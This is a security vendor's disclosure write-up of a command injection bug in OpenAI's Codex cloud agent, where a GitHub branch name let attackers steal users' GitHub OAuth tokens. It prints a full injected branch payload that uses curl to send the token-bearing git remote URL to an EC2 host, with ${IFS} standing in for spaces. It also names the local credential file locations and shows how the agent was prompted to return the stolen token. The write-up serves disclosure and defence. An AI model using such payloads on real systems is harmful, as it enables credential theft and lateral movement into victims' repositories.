BeyondTrust - Secure Remote Access and Privileged Access Management

Key Findings

BeyondTrust Phantom Labs™ has discovered a critical command injection vulnerability in OpenAI's Codex cloud environment that exposed sensitive GitHub credential data. The vulnerability exists within the task creation HTTP request, which allows an attacker to inject arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token—the same token Codex uses to authenticate with GitHub.

Through automated techniques, this exploit can scale to compromise multiple users interacting with a shared environment or GitHub repository. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been remediated in coordination with OpenAI’s security team.

Figure 1: Codex attack path

As shown above in Figure 1, the attack path can take several directions depending on the context the attacker is operating within. We could compromise a single user through any Codex product, or we could initiate the automated techniques entirely through GitHub without ever touching Codex. Additionally, after elevating access from Codex to GitHub, we could employ the automated techniques in GitHub.

Responsible Disclosure Timeline

  • December 16, 2025: Disclosure sent to OpenAI through BugCrowd.

  • December 22, 2025: Initial response from OpenAI. OpenAI confirmed investigation of vulnerability.

  • December 23, 2025: OpenAI issues hotfix for command injection vulnerability.

  • January 22, 2026: OpenAI issues fix for GitHub branch shell escape.

  • January 30, 2026: OpenAI implements additional shell escape hardening and limits GitHub token access.

  • February 5, 2026: OpenAI classifies the vulnerability as Critical (Priority 1). Received permission to publicly disclose.

Background

What is OpenAI Codex?

OpenAI Codex is a cloud-based coding agent, accessible through ChatGPT. It allows users to point the tool toward a codebase and submit tasks through a prompt. Codex then spins up a managed container instance to execute these tasks—such as generating code, answering questions about a codebase, creating pull requests, and performing code reviews against the selected repository.

Codex natively interfaces with GitHub, allowing developers to leverage Codex against their GitHub repositories. To perform these actions on GitHub, users must first connect their GitHub account by authorizing the Codex application through GitHub's OAuth flow, as shown below in Figure 2.

Figure 2: Authorizing ChatGPT Codex Connector on the GitHub application

GitHub Integration

GitHub applications like the ChatGPT Codex Connector generate short-lived, scoped OAuth 2.0 access tokens that function on behalf of the consenting user. With the proper scopes, an application can query information about a user’s or organization’s GitHub instance, as shown below in Figure 3.

Figure 3: Codex GitHub application pulling repository and branch information

The ChatGPT Codex GitHub application is privileged by default, as it requires access to repositories, workflows, actions, and more. Figure 4 shows the permissions granted upon application consent. These permissions become more impactful when the application is authorized within an organization’s GitHub environment, granting Codex access to private organizational resources.

Figure 4: Codex GitHub application permissions

Command Injection Vulnerability Technical Deep Dive

OpenAI Codex Web Portal: GitHub Token Compromise

In the Codex Web portal, users can submit prompts to review, modify, and perform actions against GitHub repositories and their branches (Figure 5). This is extremely powerful for developers looking to leverage large language models (LLMs) to improve their development capabilities.

Figure 5: Asking Codex a question

BeyondTrust Phantom Labs began interacting with the platform and proxying all web traffic. Under the hood, when a user creates and submits a prompt against a repository and branch, the platform generates a “cloud task”, sending a POST request to https://chatgpt.com/backend-api/wham/tasks with the environment identifier, branch, and prompt text (Figure 6).

Figure 6: Body of POST request to https://chatgpt.com/backend-api/wham/tasks

On the backend, Codex Web creates an environment, which spins up a container with pre-installed languages, packages, and tools. Environments can be customized with setup scripts, environment variables, and secrets. By default, they have internet access during setup script execution to install dependencies, but they can be configured to restrict or limit outbound access. All outbound internet access is tunneled through an HTTP/HTTPS proxy.

Once an environment is spun up, the container installs the setup scripts and clones the selected repository and branch. Upon reviewing the platform logs, we identified that the container passes the GitHub OAuth token during the cloning process; however, the token was obfuscated in the web portal, as shown below in Figure 7.

Figure 7: Obfuscated GitHub OAuth token in log output

The obfuscated OAuth token in the container logs immediately stood out to us. Further investigation revealed that, although the container used the token in the GitHub remote configuration, the token was removed during the agent’s runtime. This was confirmed (Figure 8) when we queried the command history within the agent runtime and received no results. We suspected the container had multiple bash scripts running, one handling repository installation and a separate one handling script execution.

Figure 8: Failure of the history command
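The behavior described above, where the token is present in the remote configuration during cloning but absent at agent runtime, can be illustrated with a minimal sketch of credential scrubbing. This is not OpenAI's implementation. The URL shape (userinfo embedded before the host) and the `x-access-token` username are assumptions used only for illustration.

```python
from urllib.parse import urlsplit, urlunsplit


def has_credentials(remote_url: str) -> bool:
    """Return True if the URL carries a username or password component."""
    parts = urlsplit(remote_url)
    return parts.username is not None or parts.password is not None


def strip_credentials(remote_url: str) -> str:
    """Rebuild the URL without its userinfo part (user:token@)."""
    parts = urlsplit(remote_url)
    host = parts.hostname or ""
    if parts.port is not None:
        host = f"{host}:{parts.port}"
    return urlunsplit((parts.scheme, host, parts.path, parts.query, parts.fragment))


# Hypothetical remote URL; the token value is a placeholder.
remote = "https://x-access-token:PLACEHOLDER_TOKEN@github.com/example-org/example-repo.git"
print(has_credentials(remote))
print(strip_credentials(remote))
```

Scrubbing of this kind only protects code that runs after the scrub. Anything executed in the same shell before it, such as an injected command during cloning, still sees the original URL.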

In order to obtain the OAuth token, we needed to get execution within the bash shell where the remote configuration was set and the repository was retrieved. After exploring several unsuccessful avenues—including setup scripts and environment variables—we identified that the branch parameter in the POST request to https://chatgpt.com/backend-api/wham/tasks was reflected in the environment setup script and remote configuration (Figure 9 and Figure 10).

Figure 9: Main branch defined in task creation POST request
Figure 10: Main branch reflected in git fetch command

To verify that values passed in the branch parameter were reflected in the environment setup, we provided a payload of “-1” as the branch name. The container raised an error in the Codex environment logs, indicating a lack of input sanitization in the POST request. We then created a command injection payload to output the git remote URL and the embedded OAuth token to a file, before asking the Codex agent to read and return the file’s contents.

We used the following JSON payload to:

  • Set the branch to main

  • Append a second command to copy the output of the git remote URL and OAuth token to a file

  • Ask the Codex agent via the prompt to list the contents of that file

Figure 11: Command injection embedded in branch name
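To make the injection class concrete, here is a minimal sketch of how a branch name interpolated into a shell string differs from a quoted or shell-free invocation. The real setup script is not reproduced in this write-up, so the `git fetch origin <branch>` template, the function names, and the harmless `echo` payload are all assumptions for illustration.

```python
import shlex


def unsafe_fetch_command(branch: str) -> str:
    # Vulnerable pattern: the branch name is pasted into a shell string as-is,
    # so characters such as ';' or backticks are interpreted by the shell.
    return f"git fetch origin {branch}"


def quoted_fetch_command(branch: str) -> str:
    # shlex.quote wraps the value so a POSIX shell treats it as one literal word.
    return f"git fetch origin {shlex.quote(branch)}"


def fetch_argv(branch: str) -> list[str]:
    # Preferred: build an argument vector and run it without a shell
    # (for example with subprocess.run(argv)). Using the full ref path also
    # means a value such as "-1" cannot be read as a command-line option.
    return ["git", "fetch", "origin", f"refs/heads/{branch}"]


# Hypothetical, harmless payload standing in for the real one.
payload = "main; echo INJECTED > /tmp/out.txt"
print(unsafe_fetch_command(payload))   # a shell would run two commands
print(quoted_fetch_command(payload))   # a shell would see one odd branch name
print(fetch_argv(payload))             # no shell is involved at all
```

In the unsafe form, the semicolon ends the `git fetch` command and starts a second one. In the other two forms, the whole value reaches git as a single (invalid) ref name and the fetch simply fails.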

When reviewing the task output in the Codex Web portal, we successfully obtained the cleartext GitHub OAuth token. An attacker can now leverage this token to move laterally into GitHub.

Figure 12: Retrieving the stolen token

Codex CLI, SDK, IDE GitHub Token Compromise

Upon achieving GitHub token compromise via the web portal, we were curious if this vulnerability extended to other Codex applications, including the Codex CLI, SDK, and IDE integration. We began investigating how the host-based applications authenticated and interacted with backend APIs. We discovered that the Codex application stores authentication credentials locally in the following directories:

  • Windows: %USERPROFILE%\.codex\auth.json

  • macOS / Linux: ~/.codex/auth.json

The auth.json file contains sensitive credential material, including OpenAI API keys; ID, access, and refresh tokens; and the associated account identifier, as shown below in Figure 13. If an attacker had access to an endpoint running one of these applications, they could use the available tokens to authenticate to the Codex Cloud backend API, passing the access_token value in the Authorization header of the HTTP requests.

Figure 13: Codex authentication tokens stored in auth.json
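Because these credentials sit in a well-known location, defenders may want to check how the file is exposed on their endpoints. The following is a minimal sketch, assuming a POSIX system where permission bits are meaningful. The function names are hypothetical, and the check does not parse the file or depend on its internal structure.

```python
import os
import stat
from pathlib import Path
from typing import Optional


def codex_auth_path(home: Optional[Path] = None) -> Path:
    """Return <home>/.codex/auth.json; Path.home() covers both listed locations."""
    base = home if home is not None else Path.home()
    return base / ".codex" / "auth.json"


def is_group_or_world_accessible(path: Path) -> bool:
    """True if any group/other permission bit is set (POSIX semantics only)."""
    mode = stat.S_IMODE(path.stat().st_mode)
    return bool(mode & (stat.S_IRWXG | stat.S_IRWXO))


if __name__ == "__main__":
    auth_file = codex_auth_path()
    if not auth_file.exists():
        print(f"{auth_file} not found")
    elif os.name == "posix" and is_group_or_world_accessible(auth_file):
        print(f"{auth_file} is readable beyond its owner; consider chmod 600")
    else:
        print(f"{auth_file} found; no group/other permission bits detected")
```

Tight file permissions do not help against an attacker already running as the same user, so this is a hygiene check rather than a mitigation for the attack described here.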

With the ability to authenticate through the compromised access token, we replicated the attack against the OpenAI Codex Web portal, demonstrated below in Figure 14.

Figure 14: Replicating the Codex website attack with Codex application tokens

With no user interface to review the output of our task, we began probing the backend API, ultimately identifying that it was possible to retrieve a user’s task history by sending a GET request to https://chatgpt.com/backend-api/codex/tasks. Figure 15 shows the output in Postman.

Figure 15: Discovering Codex task history backend API

With the full task history, we were able to obtain the identifier of our latest task and append it to our existing URL path, providing us with the container logs of the specific task. In the output of the task contents, we confirmed access to the GitHub access token, demonstrated below in Figure 16.

Figure 16: Obtaining the GitHub OAuth token through API

Automated Token Exfiltration Through GitHub Branch Command Injection

Although we successfully compromised the GitHub access token, we wanted to increase the severity and scale of our attack. With the help of Fletcher Davis, our Director of Research, we developed an automated variant of the attack that could compromise multiple users’ GitHub tokens by tampering with the branch name of the GitHub repository.

As shown previously, the GitHub branch name was targeted in the POST request to the backend Codex API. However, with the right access to a GitHub repository, it is possible to tamper with the branches themselves, allowing an attacker to execute the command injection and exfiltrate GitHub tokens from multiple users who run Codex against that repository. This could allow an attacker to move laterally or escalate privileges in GitHub.

To perform this variation, an attacker needs to create a new branch or modify an existing branch. We leveraged AWS EC2 to host our external server and receive the GitHub OAuth token. Here’s the GitHub API endpoint and payload:

  • GitHub Ref Payload: refs/heads/main;curl${IFS}'ec2-51-388-32-123.compute-1.amazonaws.com/'`git${IFS}-C${IFS}/workspace/TylersTestRepo${IFS}remote${IFS}get-url${IFS}origin`;

GitHub implements several restrictions when creating and naming branches. Because our branch name is interpolated into a shell command and evaluated in a Bash context, shell metacharacters can be leveraged to break out of the expected context and execute arbitrary commands, all within GitHub’s branch naming restrictions. The key is to replace literal spaces with ${IFS}, a reference to the shell’s internal field separator variable. GitHub blocks spaces in branch names but not ${IFS}, which Bash expands to whitespace by default, so the shell splits the words as if a space had been typed.
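The substitution can be sketched in a few lines. This is a rough model only: it treats `${IFS}` as a plain space, whereas a real shell expands it to space, tab, and newline by default and then performs word splitting. The helper names are hypothetical, and the command is the inner `git` call from the payload above.

```python
def spaces_to_ifs(command: str) -> str:
    """Replace literal spaces so the text contains no space characters."""
    return command.replace(" ", "${IFS}")


def simulate_ifs_expansion(fragment: str) -> str:
    """Approximate what the shell sees after expanding an unquoted ${IFS}."""
    return fragment.replace("${IFS}", " ")


command = "git -C /workspace/TylersTestRepo remote get-url origin"
encoded = spaces_to_ifs(command)

print(encoded)
print(" " in encoded)                              # no literal spaces remain
print(simulate_ifs_expansion(encoded) == command)  # the shell recovers the command
```

The encoded string contains no character that a space filter would catch, which is why blocking spaces alone does not make a ref name safe to place in a shell command.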

The payload of the GitHub branch name is shown below:

Figure 17: Creating a command injection payload through GitHub branch name

Command Injection Vulnerability Mitigations

The root cause of this vulnerability is a lack of input sanitization for container-related web requests. As AI agents become more prevalent, both organizations and vendors must prioritize agentic AI security by treating agent containers as strict security boundaries.

  • For vendors building AI agents, all user-controllable input should be sanitized before being passed to shell commands, particularly parameters sourced from external providers like GitHub. Passing user input directly into shell scripts through string interpolation should be avoided entirely in favor of parameterized commands or safe APIs. Shell metacharacters and backticks should be escaped or blocked in any input that touches a command line. External provider data formats should not be trusted as inherently safe since GitHub allows characters in branch names that are dangerous in a shell context. Token permissions and lifetimes inside agent containers should be scoped to the minimum required for the task.

  • Organizations using AI coding agents must regularly audit the permissions granted to AI applications in GitHub to enforce AI agent identity governance and least privilege. Utilizing AI security posture management may streamline this audit process. AI agents installed at the organizational level carry elevated risk, as a single compromised user token cascades across all repositories with overlapping permissions. Repositories should be monitored for unusual branch names containing shell metacharacters or Unicode space characters, and GitHub tokens should be rotated regularly with access logs reviewed for unexpected API activity.
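The branch-name monitoring suggested above could start from a simple heuristic like the following sketch. The character set is an assumption chosen for illustration, not a complete list of dangerous shell syntax, and the function names are hypothetical. Branch names would need to be supplied from whatever inventory or API the organization already uses.

```python
import unicodedata

# Assumed set of characters that are meaningful to a POSIX shell.
SHELL_METACHARACTERS = set(";&|`$(){}<>'\"\\!*?[]")

# Unicode general categories for space, line, and paragraph separators.
SEPARATOR_CATEGORIES = {"Zs", "Zl", "Zp"}


def suspicious_characters(branch_name: str) -> list[str]:
    """Return the sorted, de-duplicated characters that warrant review."""
    found = set()
    for ch in branch_name:
        if ch in SHELL_METACHARACTERS:
            found.add(ch)
        elif ch.isspace() or unicodedata.category(ch) in SEPARATOR_CATEGORIES:
            # Report whitespace by code point so it is visible in logs.
            found.add(f"U+{ord(ch):04X}")
    return sorted(found)


def is_suspicious(branch_name: str) -> bool:
    return bool(suspicious_characters(branch_name))


for name in ["main", "feature/login-form", "main;curl${IFS}example.invalid"]:
    print(name, is_suspicious(name), suspicious_characters(name))
```

A check like this is a detection aid and will produce false positives on unusual but legitimate names. It does not replace fixing the code that consumes the branch name.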

How BeyondTrust Can Help

As AI coding agents become embedded in development workflows, organizations need visibility into how these identities interact with systems, credentials, and infrastructure.

BeyondTrust’s Identity Security Insights helps security teams uncover and understand these relationships by mapping identity access across environments, including human, non-human, and emerging AI-driven identities. By analyzing privilege, entitlement paths, and identity behavior, organizations can identify hidden risks, such as excessive access, exposed credentials, or unintended pathways that could be leveraged in attacks like those demonstrated in this research.

This approach to AI security enables teams to move beyond isolated controls and gain a clearer view of how identity-based risks (including those introduced by AI agents) can propagate across systems, helping prioritize remediation before they are exploited.

Conclusion

AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources. Because these agents act autonomously, security teams must understand how to govern AI agent identities to prevent command injection, token theft, and automated exploitation at scale. As AI agents become more deeply integrated into developer workflows, the security of the containers they run in—and the input they consume—must be treated with the same rigor as any other application security boundary. The attack surface is expanding, and the security of these environments needs to keep pace.

Acknowledgements

We appreciate OpenAI’s prompt response and collaboration in addressing these findings to help protect customers. We value the partnership and look forward to continuing to work together to advance the security of AI systems.

Explore More Research from Phantom Labs

Phantom Labs™ researchers "think like attackers" to expose privilege escalation paths and identity attack vectors, helping defenders proactively uncover misconfigurations and detect threats in complex hybrid and cloud environments.


About Our Authors

Tyler Jespersen

Security Researcher

Tyler is a security researcher passionate about breaking things, blending vulnerability research with detection engineering. He's driven by the challenge of uncovering high-severity and critical vulnerabilities. To him, offensive security feels like a game, and he's happiest when he's deep in a rabbit hole, poking at something that wasn't supposed to break. He's always learning, always hunting, and always chasing the next big find.


Phantom Labs™

BeyondTrust

BeyondTrust Phantom Labs™ believes the best way to fully understand cybersecurity threats is to work closely with our customers and partners, conducting real world research into the attacks that matter most to them. By dissecting emerging attack methods and exploitation techniques of threat actors, as well as conducting novel research, the team’s mission is to help organizations defend against identity threats.